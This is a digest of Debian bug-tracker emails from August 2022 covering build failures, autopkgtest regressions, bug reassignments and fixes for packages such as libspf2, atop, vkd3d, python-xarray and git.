Processed: src:gjiten: invalid maintainer address
Processing commands for cont...@bugs.debian.org: > tags 1014135 +bookworm Bug #1014135 [src:gjiten] src:gjiten: invalid maintainer address Added tag(s) bookworm. > End of message, stopping processing here. Please contact me if you need assistance. -- 1014135: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014135 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1016345: marked as done (stealth: FTBFS: make[1]: *** [debian/rules:34: override_dh_auto_build-indep] Error 1)
Your message dated Sun, 14 Aug 2022 00:19:08 + with message-id and subject line Bug#1016345: fixed in stealth 4.03.01-2 has caused the Debian Bug report #1016345, regarding stealth: FTBFS: make[1]: *** [debian/rules:34: override_dh_auto_build-indep] Error 1 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016345: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016345 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: stealth Version: 4.03.01-1 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20220728 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > make[1]: Entering directory '/<>' > ./build uguide > mkdir -p tmp/manual/LaTeX tmp/manual/html tmp/manual/pdf tmp/manual/ps > tmp/manual/text > g++ --std=c++0x -o tmp/usage documentation/manual/usage.cc > tmp/usage > tmp/usage.txt > yodl2html -l3 stealth.yo > Yodl2html 4.03.03 > Yodl: including file ../../release.yo > Yodl is processing a(n) report > Document title: Stealth V. 4.03.01 > Yodl: including file intro > Yodl: including file whatsnew > Yodl: including file install/intro > Yodl: including file install/compile > Yodl: including file access/intro > Yodl: including file access/monitor > Yodl: including file access/client > Yodl: including file access/login > Yodl: including file access/using > Yodl: including file policy/intro > Yodl: including file policy/defines > Yodl: including file policy/use > Yodl: including file policy/commands > Yodl: including file policy/label > Yodl: including file policy/local > Yodl: including file policy/remote > Yodl: including file policy/preventing > Yodl: including file running/intro > Yodl: including file running/installing > Yodl: including file running/options > Yodl: including file running/rsyslog > Yodl: including file running/makepolicy > Yodl: including file running/define > Yodl: including file running/use > Yodl: including file running/commands > Yodl: including file running/obtaining > Yodl: including file running/checking > Yodl: including file running/checkingfind > Yodl: including file running/checkingsetuid > Yodl: including file running/checkingconfig > Yodl: including file running/policy > Yodl: including file running/firstrun > Yodl: including file running/mailed > Yodl: including file running/files > Yodl: including file running/newrunsame > Yodl: including file running/newrundelta > Yodl: including file running/failing > Yodl: including file running/skipping > Yodl: including file running/cron > Yodl: including file running/rotate > Yodl: including file running/status.yo > Yodl: including file running/logrotate.yo > Yodl: including file kickstart > Yodl: including file usage > Yodl: including file errors > mv *.html ../../tmp/manual/html > yodl2latex -o ../../tmp/manual/LaTeX/stealth.latex stealth.yo > Yodl2latex 4.03.03 > Yodl: including file ../../release.yo > Yodl is processing a(n) report > Document title: Stealth V.4.03.01 > Yodl: including file intro > Yodl: including file whatsnew > Yodl: including file install/intro > Yodl: including file install/compile > Yodl: including file access/intro > Yodl: including file access/monitor > Yodl: including file access/client > Yodl: including file access/login > Yodl: including file access/using > Yodl: including file policy/intro > Yodl: including file policy/defines > Yodl: including file policy/use > Yodl: including file policy/commands > Yodl: including file policy/label > Yodl: including file policy/local > Yodl: including file policy/remote > Yodl: including file policy/preventing > Yodl: including file running/intro > Yodl: including file running/installing > Yodl: including file running/options > Yodl: including file running/rsyslog > Yodl: including file running/makepolicy > Yodl: including file running/define > Yodl: including file running/use > Yodl: including file running/commands > Yodl: including file running/obtaining > Yodl: including file running/checking > Yodl: including file running/checkingfind > Yodl: including file running/checkingsetuid > Yodl: including file running/checkingconfig > Yodl: including file running/policy > Yodl: including file running/firstrun > Yodl: including file running/mailed > Yodl: including file running/files > Yodl: including file running/newrunsame > Yodl: including file running/newrundelta > Yodl: including file running/failing > Yodl: including file running/skipping > Yodl: including file running/cron > Yodl: including file
Bug#1016821: marked as done (libspf2: FTBFS with glibc 2.34)
Your message dated Sat, 13 Aug 2022 21:49:00 + with message-id and subject line Bug#1016821: fixed in libspf2 1.2.10-7.2 has caused the Debian Bug report #1016821, regarding libspf2: FTBFS with glibc 2.34 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016821: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016821 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: libspf2 Version: 1.2.10-7.1 Severity: serious Tags: ftbfs sid bookworm Justification: fails to build from source (but built successfully in the past) X-Debbugs-Cc: sramac...@debian.org https://buildd.debian.org/status/fetch.php?pkg=libspf2=arm64=1.2.10-7.1%2Bb2=1659915050=0 /bin/bash ../../libtool --tag=CC --mode=link gcc -g -O2 -ffile-prefix-map=/<>=. -fstack-protector-strong -Wformat -Werror=format-security -Wall -Wl,-z,relro -Wl,--version-script=/<>/debian/libspf2.ver -o spfquery spfquery.o ../../src/libspf2/libspf2.la -lpthread -lnsl -lresolv libtool: link: gcc -g -O2 -ffile-prefix-map=/<>=. -fstack-protector-strong -Wformat -Werror=format-security -Wall -Wl,-z -Wl,relro -Wl,--version-script=/<>/debian/libspf2.ver -o .libs/spfquery spfquery.o ../../src/libspf2/.libs/libspf2.so -lpthread -lnsl -lresolv /usr/bin/ld: ../../src/libspf2/.libs/libspf2.so: undefined reference to `__dn_expand' /usr/bin/ld: ../../src/libspf2/.libs/libspf2.so: undefined reference to `__dn_skipname' collect2: error: ld returned 1 exit status make[5]: *** [Makefile:442: spfquery] Error 1 make[5]: Leaving directory '/<>/src/spfquery' Cheers -- Sebastian Ramacher --- End Message --- --- Begin Message --- Source: libspf2 Source-Version: 1.2.10-7.2 Done: Aurelien Jarno We believe that the bug you reported is fixed in the latest version of libspf2, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1016...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Aurelien Jarno (supplier of updated libspf2 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Thu, 11 Aug 2022 23:05:37 +0200 Source: libspf2 Architecture: source Version: 1.2.10-7.2 Distribution: unstable Urgency: medium Maintainer: Magnus Holmgren Changed-By: Aurelien Jarno Closes: 1016821 Changes: libspf2 (1.2.10-7.2) unstable; urgency=medium . * Non-maintainer upload. * no-libreplace.patch: disable libreplace which is not needed anymore and causes build failures with glibc 2.34 (Closes: #1016821). Checksums-Sha1: 64a81eff9456b834c88ad356b42adb008d29815c 2092 libspf2_1.2.10-7.2.dsc 3d6716ec196d674d4c6f48d718469cdfdbfc2f03 15964 libspf2_1.2.10-7.2.debian.tar.xz eda90632569ccfe5b2aeec8c94801aa1d1a52e67 5748 libspf2_1.2.10-7.2_source.buildinfo Checksums-Sha256: 5ed20aaf6edfa1e3e05d32928ebfb1ffb48b2bdea7d7f440202c904bc25854c0 2092 libspf2_1.2.10-7.2.dsc 88fcc7d6210cc5b68b328d7344837df64dafc9a62ac12894406dc9a1c9da5440 15964 libspf2_1.2.10-7.2.debian.tar.xz bceef8a92f30d95a138cc636bed6e6b6cfd19a294eaa489adcabeddc29c59a11 5748 libspf2_1.2.10-7.2_source.buildinfo Files: 988a2f968237ac7d309c284d71a78ce6 2092 libs optional libspf2_1.2.10-7.2.dsc 50881a2a870f061e547b47a9cecc0b8c 15964 libs optional libspf2_1.2.10-7.2.debian.tar.xz 828240ed18b2cb619850db0046412b51 5748 libs optional libspf2_1.2.10-7.2_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEUryGlb40+QrX1Ay4E4jA+JnoM2sFAmL1cQIACgkQE4jA+Jno M2sy5BAAjrYbik6VfZpx26EfKKwEj7xMMg8GNfAXgB/+ayqI+sJp3GlQeq7vFnqR CP58Ucd8OVr4UDe4GhNDEtMA6jq4g/iDZFVjzZAoRPzhg8BK5+KPe6BdyonQ8v9d PSZPH0nZwwBfk32+/iTlqK9T3A6R1hCgdzZ08kFKQzR/D3Kv2fPRPseCcd1n5hGd kCveVp3ISmkY2oMynjl2OkVshIsGPd/iOR10/pZnaFTSaBq9DAYMHkp44JA8aAqI yuINaxNRCUENXF7ra9VF8KrdVSvQJNzONqRNVvvIMBYmxuzjfJ/D6nPyzYvSMuZ8 z2NjBbXNtc+BmYuKF9olyBLyEXu8QtTCUnDNjeZVsLgT8dAFgVrjVm9xLDIP1UGa qqnxYFpE4Xt6coAmNqnFzXjKFUv7OmjmY69csWsTJgkz9XESvWZyJ3yC4U81p8s3 4FrzRwWUx9dURnQ2+VAxuRaR8TNNJg2T4fF74nNyoJFfIKIRPyvoKTlG5HHtfSCy hpVuCWI1hapm7aExxPPE8BU5m0LkcQTjjUH6Zt/xF8WwtczIJX3PU7AMuP5d4H+Z IF+oKYiAVdq480skswMMkNIHkaRvrqtBkid4KgUtXT0zXbIU5W6ouiUYIIhMnQHr M1Hwj8+cPtrXJjq/VAfeQ37QvktLlHSBoneis7ndR+0NBD+L9GA= =Vdrg -END PGP SIGNATURE End Message ---
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 1014735 src:glibc Bug #1014735 {Done: Aurelien Jarno } [rpcsvc-proto] rpcsvc-proto: The /usr/include/rpc/* files is not included Bug reassigned from package 'rpcsvc-proto' to 'src:glibc'. No longer marked as found in versions rpcsvc-proto/1.4.2-4. No longer marked as fixed in versions glibc/2.34-1. > fixed 1014735 2.34-1 Bug #1014735 {Done: Aurelien Jarno } [src:glibc] rpcsvc-proto: The /usr/include/rpc/* files is not included Marked as fixed in versions glibc/2.34-1. > affects 1014735 rpcsvc-proto Bug #1014735 {Done: Aurelien Jarno } [src:glibc] rpcsvc-proto: The /usr/include/rpc/* files is not included Added indication that 1014735 affects rpcsvc-proto > thanks Stopping processing here. Please contact me if you need assistance. -- 1014735: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014735 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1014310: src:openjfx: fails to migrate to testing for too long: FTBFS on arm64 and armhf
Hi Paul, On Sat, Aug 13, 2022 at 09:51:03PM +0200, Paul Gevers wrote: > Hi, > > On Sun, 3 Jul 2022 21:25:49 +0200 Paul Gevers wrote: > > Your package failed to build from source on arm64 and armhf while it > > built there successfully in the past. > > I just checked to see if there would be a commit upstream to fix the FTBFS, > but it seems that upstream is active and is at release 20+1 (from 16 days > ago), but in a new place (so the debian/watch file isn't working). > > https://github.com/openjdk/jfx For JDK 11, I believe we want https://github.com/openjdk/jfx11u For JDK 17, it would be https://github.com/openjdk/jfx17u > You may want to look into this. Agreed. Java Team, should we be targeting OpenJFX 17 for bookworm, or is an updated build of OpenJFX 11 of use? signature.asc Description: PGP signature
Processed: unconfuse the bts
Processing commands for cont...@bugs.debian.org: > # same version in found and fixed > notfound 1006094 1.100263+20170512-2 Bug #1006094 {Done: "Dr. Tobias Quathamer" } [src:fonts-roboto-slab] fonts-roboto-slab: FTBFS: pkg_resources.DistributionNotFound: The 'unicodedata2>=14.0.0' distribution was not found and is required by fonttools No longer marked as found in versions fonts-roboto-slab/1.100263+20170512-2. > thanks Stopping processing here. Please contact me if you need assistance. -- 1006094: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1006094 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: unconfuse the bts
Processing commands for cont...@bugs.debian.org: > # with the same version in found and fixed > notfound 1011793 0.18.0~b1-1 Bug #1011793 {Done: Timo Röhling } [src:python-ecdsa] python-ecdsa: FTBFS: dh_auto_test: error: pybuild --test --test-pytest -i python{version} -p "3.9 3.10" returned exit code 13 No longer marked as found in versions python-ecdsa/0.18.0~b1-1. > thanks Stopping processing here. Please contact me if you need assistance. -- 1011793: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1011793 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 1013218 rails Bug #1013218 {Done: Pirate Praveen } [ruby-sprockets] rails: ftbfs SyntaxError: Unexpected token 'export' Bug reassigned from package 'ruby-sprockets' to 'rails'. No longer marked as found in versions ruby-sprockets/3.7.2-3. No longer marked as fixed in versions rails/2:6.1.4.7+dfsg-1. > fixed 1013218 2:6.1.4.7+dfsg-1 Bug #1013218 {Done: Pirate Praveen } [rails] rails: ftbfs SyntaxError: Unexpected token 'export' There is no source info for the package 'rails' at version '2:6.1.4.7+dfsg-1' with architecture '' Unable to make a source version for version '2:6.1.4.7+dfsg-1' Marked as fixed in versions 2:6.1.4.7+dfsg-1. > affects 1013218 ruby-sprockets Bug #1013218 {Done: Pirate Praveen } [rails] rails: ftbfs SyntaxError: Unexpected token 'export' Added indication that 1013218 affects ruby-sprockets > thanks Stopping processing here. Please contact me if you need assistance. -- 1013218: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013218 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 1011768 ecmwflibs Bug #1011768 {Done: Alastair McKinstry } [src:cfgrib] cfgrib: FTBFS: ERROR tests/test_50_xarray_getitem.py - RuntimeError: Cannot find the ecCodes... Bug reassigned from package 'src:cfgrib' to 'ecmwflibs'. No longer marked as found in versions cfgrib/0.9.10.1-1. No longer marked as fixed in versions ecmwflibs/2:0.4.16-2. > affects 1011768 cfgrib Bug #1011768 {Done: Alastair McKinstry } [ecmwflibs] cfgrib: FTBFS: ERROR tests/test_50_xarray_getitem.py - RuntimeError: Cannot find the ecCodes... Added indication that 1011768 affects cfgrib > fixed 1011768 2:0.4.16-2 Bug #1011768 {Done: Alastair McKinstry } [ecmwflibs] cfgrib: FTBFS: ERROR tests/test_50_xarray_getitem.py - RuntimeError: Cannot find the ecCodes... There is no source info for the package 'ecmwflibs' at version '2:0.4.16-2' with architecture '' Unable to make a source version for version '2:0.4.16-2' Marked as fixed in versions 2:0.4.16-2. > thanks Stopping processing here. Please contact me if you need assistance. -- 1011768: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1011768 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 1011719 ecmwflibs Bug #1011719 {Done: Alastair McKinstry } [src:eccodes-python] satpy: FTBFS: E RuntimeError: Cannot find the ecCodes library Bug reassigned from package 'src:eccodes-python' to 'ecmwflibs'. No longer marked as found in versions eccodes-python/2:1.4.2-1. No longer marked as fixed in versions ecmwflibs/2:0.4.16-2. > fixed 1011719 2:0.4.16-2 Bug #1011719 {Done: Alastair McKinstry } [ecmwflibs] satpy: FTBFS: E RuntimeError: Cannot find the ecCodes library There is no source info for the package 'ecmwflibs' at version '2:0.4.16-2' with architecture '' Unable to make a source version for version '2:0.4.16-2' Marked as fixed in versions 2:0.4.16-2. > affects 1011719 eccodes-python Bug #1011719 {Done: Alastair McKinstry } [ecmwflibs] satpy: FTBFS: E RuntimeError: Cannot find the ecCodes library Added indication that 1011719 affects eccodes-python > thanks Stopping processing here. Please contact me if you need assistance. -- 1011719: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1011719 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 929685 ca-certificates-java 20190405 Bug #929685 {Done: Matthias Klose } [ca-certificates-java,default-jre-headless,openjdk-11-jre-headless] ca-certificates-java,default-jre-headless,openjdk-11-jre-headless: get rid of the circular dependency Bug reassigned from package 'ca-certificates-java,default-jre-headless,openjdk-11-jre-headless' to 'ca-certificates-java'. No longer marked as found in versions ca-certificates-java/20190405, openjdk-11-jre, openjdk-11/11.0.3+1-1, and java-common/0.71. No longer marked as fixed in versions ca-certificates-java/20220719. Bug #929685 {Done: Matthias Klose } [ca-certificates-java] ca-certificates-java,default-jre-headless,openjdk-11-jre-headless: get rid of the circular dependency Marked as found in versions ca-certificates-java/20190405. > affects 929685 openjdk-11 java-common openjdk-11-jre Bug #929685 {Done: Matthias Klose } [ca-certificates-java] ca-certificates-java,default-jre-headless,openjdk-11-jre-headless: get rid of the circular dependency Added indication that 929685 affects openjdk-11, java-common, and openjdk-11-jre > fixed 929685 20220719 Bug #929685 {Done: Matthias Klose } [ca-certificates-java] ca-certificates-java,default-jre-headless,openjdk-11-jre-headless: get rid of the circular dependency Marked as fixed in versions ca-certificates-java/20220719. > thanks Stopping processing here. Please contact me if you need assistance. -- 929685: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929685 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1017107: libpmix2: dangling /usr/lib/x86_64-linux-gnu/libpmix.so.2 symlink
Package: libpmix2 Version: 4.2.0~rc1-1 Severity: critical Justification: breaks unrelated software Hi, The upload of pmix version 4.2.0~rc1-1 introduced a dangling symlink, /usr/lib/x86_64-linux-gnu/libpmix.so.2 points to pmix2/lib/libpmix.so.2.5.2 which doesn't exist anymore as it has been renamed into pmix2/lib/libpmix.so.2.6.0. This breaks unrelated software: https://buildd.debian.org/status/fetch.php?pkg=dolfin=amd64=2019.2.0%7Egit20220407.d29e24d-5%2Bnmu1=1660402579=0 https://ci.debian.net/data/autopkgtest/testing/amd64/m/mpi4py/24742525/log.gz https://ci.debian.net/data/autopkgtest/testing/amd64/o/openmpi/24742526/log.gz Regards Aurelien
Bug#1012900: fixed in bctoolbox 5.0.37-2
Hi, On Sun, 24 Jul 2022 16:04:07 + Debian FTP Masters wrote: bctoolbox (5.0.37-2) experimental; urgency=medium . * Cherry-pick upstream patch e142436 (Closes: #1012900) Can we have this fix in unstable too please? bctoolbox is a key package. Please fix RC bugs in unstable/bookworm too. Paul OpenPGP_signature Description: OpenPGP digital signature
Bug#1017106: vkd3d: build depends on strictly versioned arch:all binary of itself
Source: vkd3d Version: 1.2-13 Severity: serious Justification: ftbfs Dear maintainer, Your package currently doesn't get build on ppc64el because it build-depends on the to-be-build version of libvkd3d-headers, but the version available on ppc64el is the previously built version. Your trick seems to have worked on other architectures, but it's a race condition (and doesn't work elsewhere). I just discussed this on #debian-ftp does anybody have a clue where to look why libvkd3d-headers (arch:all) isn't available on ppc64el causing ppc64el to not build vkd3d -*- elbrus stares at https://buildd.debian.org/status/package.php?p=vkd3d because -13 is the current version on ppc64el, but it wants -14 how can this work?= it can't of course but it's an interesting idea: build-depending on itself, just another architecture sorry, I should have spotted that -*- elbrus will file a bug thx worked elsewhere dak is supposed to export only arch-all packages of the matching version. maybe this does not work always or what aka if a source got arch-any with version 1 and arch-all with version 1 and 2, only the version 1 should be available in the Packages files maybe that doesn't extend to incoming? ie there's a ~6h window where you *can* pull in the arch:all version the header dependency is !i386 !amd64 and the arm64 build picked it up from incoming right, incoming. yes that makes sense then Paul
Processed: found 1014785 in 1.15.4+dfsg1-1
Processing commands for cont...@bugs.debian.org: > found 1014785 1.15.4+dfsg1-1 Bug #1014785 {Done: Bastien Roucariès } [src:dojo] dojo: CVE-2021-23450 Marked as found in versions dojo/1.15.4+dfsg1-1. > thanks Stopping processing here. Please contact me if you need assistance. -- 1014785: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014785 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1016937: atop: autopkgtest regression on arm64 and armhf and times out on s390x
Hi, On 13-08-2022 21:34, Marc Haber wrote: running atop from unstable also hangs: root@elbrus:~# atop ^C on zelenka, running the atop binary just works fine. Installing atop 2.7.1-2 in a DD chroot on zelenka also works fine, and the binary is ok as well. However, the chroots dont start the services though. Progress. Now, instead of killing it, I sent it to the background and when I then take it to the foreground, it works as expected. root@ci-worker-s390x-01:~# atop ^Z [1]+ Stopped atop root@ci-worker-s390x-01:~# fg atop root@ci-worker-s390x-01:~# Same with your command in the test: root@ci-worker-s390x-01:~# atop -P cpu 5 1 ^Z [1]+ Stopped atop -P cpu 5 1 root@ci-worker-s390x-01:~# fg atop -P cpu 5 1 RESET cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 0 12314475 57940088 197207 116525509 1229493 133423 982033 4278583 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 1 13096470 56792358 204646 118023945 1290960 133142 321874 3737087 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 2 12982530 56925413 209005 117993872 1288573 131703 322564 3746751 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 3 13465982 56697100 208873 117747350 1287548 131114 322660 3739777 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 4 13639265 56795653 213211 117476209 1276394 130964 321365 3747339 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 5 13326756 56460169 202500 118173964 1261805 129906 322232 3723116 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 6 12968736 56176871 207863 118788707 1265701 130806 329336 3732416 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 7 13026985 56068710 211225 118856524 1248204 130943 321583 3736213 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 8 14194105 56997563 204065 116748001 1264309 130682 320834 3740854 0 0 100 0 0 cpu ci-worker-s390x-01 1660421134 2022/08/13 16:05:34 1936023 100 9 13285438 56060337 205755 118583081 1279057 130206 323123 3733407 0 0 100 0 0 SEP Anybody any clue? Paul OpenPGP_signature Description: OpenPGP digital signature
Bug#1014310: src:openjfx: fails to migrate to testing for too long: FTBFS on arm64 and armhf
Hi, On Sun, 3 Jul 2022 21:25:49 +0200 Paul Gevers wrote: Your package failed to build from source on arm64 and armhf while it built there successfully in the past. I just checked to see if there would be a commit upstream to fix the FTBFS, but it seems that upstream is active and is at release 20+1 (from 16 days ago), but in a new place (so the debian/watch file isn't working). https://github.com/openjdk/jfx You may want to look into this. Paul OpenPGP_signature Description: OpenPGP digital signature
Processed: Re: Bug#1013939: fixed in python-xarray 2022.06.0-3
Processing control commands: > reopen -1 Bug #1013939 {Done: Alastair McKinstry } [src:python-xarray] python-xarray: autopkgtest regression: Left and right DataArray objects are not close 'reopen' may be inappropriate when a bug has been closed with a version; all fixed versions will be cleared, and you may need to re-add them. Bug reopened No longer marked as fixed in versions python-xarray/2022.06.0-3. -- 1013939: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013939 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1013939: fixed in python-xarray 2022.06.0-3
Control: reopen -1 Hi, On Fri, 12 Aug 2022 11:33:53 + Debian FTP Masters wrote: python-xarray (2022.06.0-3) unstable; urgency=medium . * Depend on scipy >= 1.8.1-8 for fixes. Closes: #1004869, #1013939 But the log [1] that was generated by the migration trial run has the output below and the runs in unstable fail too (so no missing *versioned* items). === FAILURES === ___ test_weighted_operations_nonequal_coords ___ def test_weighted_operations_nonequal_coords(): # There are no weights for a == 4, so that data point is ignored. weights = DataArray(np.random.randn(4), dims=("a",), coords=dict(a=[0, 1, 2, 3])) data = DataArray(np.random.randn(4), dims=("a",), coords=dict(a=[1, 2, 3, 4])) check_weighted_operations(data, weights, dim="a", skipna=None) q = 0.5 result = data.weighted(weights).quantile(q, dim="a") # Expected value computed using code from https://aakinshin.net/posts/weighted-quantiles/ with values at a=1,2,3 expected = DataArray([0.9308707], coords={"quantile": [q]}).squeeze() > assert_allclose(result, expected) E AssertionError: Left and right DataArray objects are not close E E Differing values: E L E array(0.058928) E R E array(0.930871) Paul [1] https://ci.debian.net/data/autopkgtest/testing/amd64/p/python-xarray/24742527/log.gz OpenPGP_signature Description: OpenPGP digital signature
Bug#1016937: atop: autopkgtest regression on arm64 and armhf and times out on s390x
On Fri, Aug 12, 2022 at 03:02:36PM +0200, Paul Gevers wrote: > On 12-08-2022 12:23, Marc Haber wrote: > > On Thu, Aug 11, 2022 at 10:51:32PM +0200, Paul Gevers wrote: > > > On 10-08-2022 12:03, Marc Haber wrote: > > > > I tried the (dead simple)d autopkgtest on the s390s and arm64 > > > > porterboxes > > > > and it succeeded in a second's time. I have sharpened the expression > > > > that counts the CPUs in lscpu's output and hope this will fix the issue. > > > > > > ooo, CPU count. Yes, some of those archs run on hosts with lots of CPU's. > > > armhf has 160, s390x has 10. > > > > I am testing locally on amd64 with a machine with 12 CPUs. The armhf > > tests succeed (see > > https://ci.debian.net/data/autopkgtest/testing/armhf/a/atop/24578667/log.gz). > > Great, same on arm64. s390x still times out though. And I would love to know which of the two pipes hang. On zelenka, everything is just fine. > > The complete test is: > > #!/bin/bash > > > > # atop reports number of CPU and two extra lines > > ATOPSOPINION="$(atop -P cpu 5 1 | grep -vE '^(RESET|SEP)' | wc -l)" > > When I run `atop` manually (on stable), it doesn't do anything... > root@ci-worker-s390x-01:~# atop > ^C > > I started up a clean unstable lxc container and installing atop takes quite > some time between: > Created symlink /etc/systemd/system/timers.target.wants/atop-rotate.timer -> > /lib/systemd/system/atop-rotate.timer. > Created symlink /etc/systemd/system/multi-user.target.wants/atop.service -> > /lib/systemd/system/atop.service. > Created symlink /etc/systemd/system/multi-user.target.wants/atopacct.service > -> /lib/systemd/system/atopacct.service. > and > Could not execute systemctl: at /usr/bin/deb-systemd-invoke line 145. > > running atop from unstable also hangs: > root@elbrus:~# atop > ^C on zelenka, running the atop binary just works fine. Installing atop 2.7.1-2 in a DD chroot on zelenka also works fine, and the binary is ok as well. However, the chroots dont start the services though. > > There is no loop, and nothing that could fail on a big number. In my > > understanding, this could run on a box with 2000 cores and still work. > > Except, it doesn't. Seems like atop is seriously broken on s390x on the > hosts that we have. Except zelenka, the only machine that is easily accessible to me. Everything is just fine there. > > Also, the test does not time out on zelenka when manually invoked in an > > schroot (setting PATH to point to an executable atop is necessary, as it > > does not seem to be possible to install an abitrary package that is not > > in the archive. Also, the test is successful if invoked after installing > > atop 2.7.1-2 from the archive. > > Maybe we need to involve the s390x porters? I put them in CC to already draw > their attention. That's what I did yesterday. Their mailing list seems to be a cozy quiet place though. Greetings Marc -- - Marc Haber | "I don't trust Computers. They | Mailadresse im Header Leimen, Germany| lose things."Winona Ryder | Fon: *49 6224 1600402 Nordisch by Nature | How to make an American Quilt | Fax: *49 6224 1600421
Processed: Re: src:git: fails to migrate to testing for too long: piuparts reports issue
Processing control commands: > clone -1 -2 Bug #1012774 {Done: Paul Gevers } [src:git] src:git: fails to migrate to testing for too long: piuparts reports issue Bug 1012774 cloned as bug 1017104 > retitle -2 during removal fails to remove /var/log/git-daemon Bug #1017104 {Done: Paul Gevers } [src:git] src:git: fails to migrate to testing for too long: piuparts reports issue Changed Bug title to 'during removal fails to remove /var/log/git-daemon' from 'src:git: fails to migrate to testing for too long: piuparts reports issue'. > notfound -2 1:2.35.1-1 Bug #1017104 {Done: Paul Gevers } [src:git] during removal fails to remove /var/log/git-daemon No longer marked as found in versions git/1:2.35.1-1. > reopen -2 Bug #1017104 {Done: Paul Gevers } [src:git] during removal fails to remove /var/log/git-daemon 'reopen' may be inappropriate when a bug has been closed with a version; all fixed versions will be cleared, and you may need to re-add them. Bug reopened No longer marked as fixed in versions git/1:2.36.1-1. > found -2 1:2.36.1-1 Bug #1017104 [src:git] during removal fails to remove /var/log/git-daemon Marked as found in versions git/1:2.36.1-1. -- 1012774: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1012774 1017104: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1017104 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1012774: src:git: fails to migrate to testing for too long: piuparts reports issue
Control: clone -1 -2 Control: retitle -2 during removal fails to remove /var/log/git-daemon Control: notfound -2 1:2.35.1-1 Control: reopen -2 Control: found -2 1:2.36.1-1 Hi, On Mon, 13 Jun 2022 21:22:09 +0200 Paul Gevers wrote: The excuses pages tells us that piuparts is reporting an issue with bin:git-daemon-run during removal: rmdir: failed to remove '/var/log/git-daemon': No such file or directory Unknown option: f deluser USER After the recent upload, this is still there. Paul OpenPGP_signature Description: OpenPGP digital signature
Bug#1005473: gcc-11-cross-ports: FTBFS: s-tsmona.adb:160: undefined reference to `dladdr'
Hi, On Sun, 13 Feb 2022 08:00:39 +0100 Lucas Nussbaum wrote: Source: gcc-11-cross-ports During a rebuild of all packages in sid, your package failed to build on amd64. Ping. gcc-11-cross-ports hasn't built since 1 February 2022. Paul OpenPGP_signature Description: OpenPGP digital signature
Processed: Re 1010814 src:faketime: fails to migrate to testing for too long: FTBFS on 32 bit architectures
Processing control commands: > tag -1 pending patch Bug #1010814 [src:faketime] src:faketime: fails to migrate to testing for too long: FTBFS on 32 bit architectures Added tag(s) patch and pending. -- 1010814: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010814 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1010814: Re 1010814 src:faketime: fails to migrate to testing for too long: FTBFS on 32 bit architectures
